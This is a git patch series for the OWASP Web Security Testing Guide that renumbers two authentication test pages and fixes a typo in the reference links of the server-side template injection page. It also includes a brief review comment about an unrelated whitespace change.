diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_for_Weaker_Authentication_in_Alternative_Channel.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weaker_Authentication_in_Alternative_Channel.md similarity index 99% rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_for_Weaker_Authentication_in_Alternative_Channel.md rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weaker_Authentication_in_Alternative_Channel.md index 4d1ee5b7eb..531b8d1935 100644 --- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_for_Weaker_Authentication_in_Alternative_Channel.md +++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weaker_Authentication_in_Alternative_Channel.md @@ -2,7 +2,7 @@ |ID | |------------| -|WSTG-ATHN-10| +|WSTG-ATHN-09| ## Summary diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/11-Testing_Multi-Factor_Authentication.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_Multi-Factor_Authentication.md similarity index 99% rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/11-Testing_Multi-Factor_Authentication.md rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_Multi-Factor_Authentication.md index c08e924e91..f37c07a21d 100644 --- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/11-Testing_Multi-Factor_Authentication.md +++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_Multi-Factor_Authentication.md 
@@ -2,11 +2,11 @@ |ID | |------------| -|WSTG-ATHN-11| +|WSTG-ATHN-10| ## Summary -Many applications implement Multi-Factor Authentication (MFA) as an additional layer of security to protect the login process. This is also known as two-factor authentication (2FA) or two-step verification (2SV) - although these are not strictly the same thing. MFA means asking the user to provide *at least* two different [authentication factors](#types-of-mfa) when logging in. +Many applications implement Multi-Factor Authentication (MFA) as an additional layer of security to protect the login process. This is also known as two-factor authentication (2FA) or two-step verification (2SV) - although these are not strictly the same thing. MFA means asking the user to provide *at least* two different [authentication factors](#types-of-mfa) when logging in. MFA adds additional complexity to both the authentication functionality, and also to other security-related areas (such as credential management and password recovery), meaning that it is critical for it to be implemented in a correct and robust manner. From c8dd891bb9347a4d85b48e5e628d868fb685f804 Mon Sep 17 00:00:00 2001 From: Manindar Mohan <53038087+manindar-mohan@users.noreply.github.com> Date: Mon, 24 Jul 2023 18:10:09 +0530 Subject: [PATCH 37/37] Update document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md Co-authored-by: ThunderSon <32433575+ThunderSon@users.noreply.github.com> --- .../17-Testing_for_Server-side_Template_Injection.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md index f4e8d94a3c..6cab22eb01 100644 
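Review bot: the @@ -2,11 hunk of 10-Testing_Multi-Factor_Authentication.md carries a second `-`/`+` pair on the Summary paragraph that is identical in visible text (a whitespace-only change) and is unrelated to the ID renumbering; drop it from this commit or mention it in the message.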
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md @@ -120,7 +120,7 @@ The tester can also identify what other objects, methods and properties can be e - [James Kettle: Server-Side Template Injection:RCE for the modern webapp (whitepaper)](https://portswigger.net/kb/papers/serversidetemplateinjection.pdf) - [Server-Side Template Injection](https://portswigger.net/blog/server-side-template-injection) - [Exploring SSTI in Flask/Jinja2](https://www.lanmaster53.com/2016/03/exploring-ssti-flask-jinja2/) -- [Server-ide Template Injection: from detection to Remote shell](https://www.okiok.com/server-side-template-injection-from-detection-to-remote-shell/) +- [Server-side Template Injection: from detection to Remote shell](https://www.okiok.com/server-side-template-injection-from-detection-to-remote-shell/) - [Extreme Vulnerable Web Application](https://github.com/s4n7h0/xvwa) - [Divine Selorm Tsa: Exploiting server-side template injection with tplmap](https://owasp.org/www-pdf-archive/Owasp_SSTI_final.pdf) - [Exploiting SSTI in Thymeleaf](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)